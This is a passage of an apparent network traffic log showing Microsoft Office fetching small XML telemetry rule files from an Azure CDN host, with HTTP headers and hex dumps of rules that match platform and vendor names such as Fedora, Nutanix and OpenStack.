                                                          2024-12-02 16:56:28 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.44982113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:28 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:28 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:28 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 479
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B989EE75B"
                                                          x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165628Z-174f7845968cdxdrhC1EWRg0en00000014k000000000vp75
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.44982213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:28 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:28 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:28 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                          ETag: "0x8DC582BA80D96A1"
                                                          x-ms-request-id: b24172ee-901e-0016-3789-3fefe9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165628Z-174f7845968xr5c2hC1EWRd0hn0000000pgg00000000k8e7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.44982313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:29 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:30 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:30 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                          ETag: "0x8DC582B97E6FCDD"
                                                          x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165630Z-174f7845968kvnqxhC1EWRmf3g0000000rmg000000002a7d
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:30 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          67192.168.2.44982513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:30 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:30 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:30 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                          ETag: "0x8DC582BA54DCC28"
                                                          x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165630Z-174f7845968qj8jrhC1EWRh41s00000014m000000000nu73
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.44982613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:30 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:30 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:30 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                          ETag: "0x8DC582BB7F164C3"
                                                          x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165630Z-174f7845968zgtf6hC1EWRqd8s0000000xng00000000h0v8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          69192.168.2.44982713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:30 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:31 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:31 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                          ETag: "0x8DC582BA48B5BDD"
                                                          x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165631Z-174f7845968nxc96hC1EWRspw800000014h0000000004uvx
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:31 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.44982413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:30 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:31 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:31 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                          ETag: "0x8DC582B9C710B28"
                                                          x-ms-request-id: 9318b81d-501e-0035-5bd6-43c923000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165631Z-174f7845968frfdmhC1EWRxxbw00000014q000000000q7em
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.44982813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:32 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:32 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:32 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                          ETag: "0x8DC582B9FF95F80"
                                                          x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165632Z-174f7845968pf68xhC1EWRr4h800000014w000000000rxqd
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.44983013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:32 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:32 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:32 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                          ETag: "0x8DC582BB3EAF226"
                                                          x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165632Z-174f7845968glpgnhC1EWR7uec00000014wg00000000aq5a
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:32 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.44982913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:32 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:32 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:32 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                          ETag: "0x8DC582BB650C2EC"
                                                          x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165632Z-174f7845968kvnqxhC1EWRmf3g0000000rkg000000005xbc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          74192.168.2.44983113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:33 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:33 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:33 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 485
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                          ETag: "0x8DC582BB9769355"
                                                          x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165633Z-174f7845968cpnpfhC1EWR3afc00000014bg00000000bs71
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
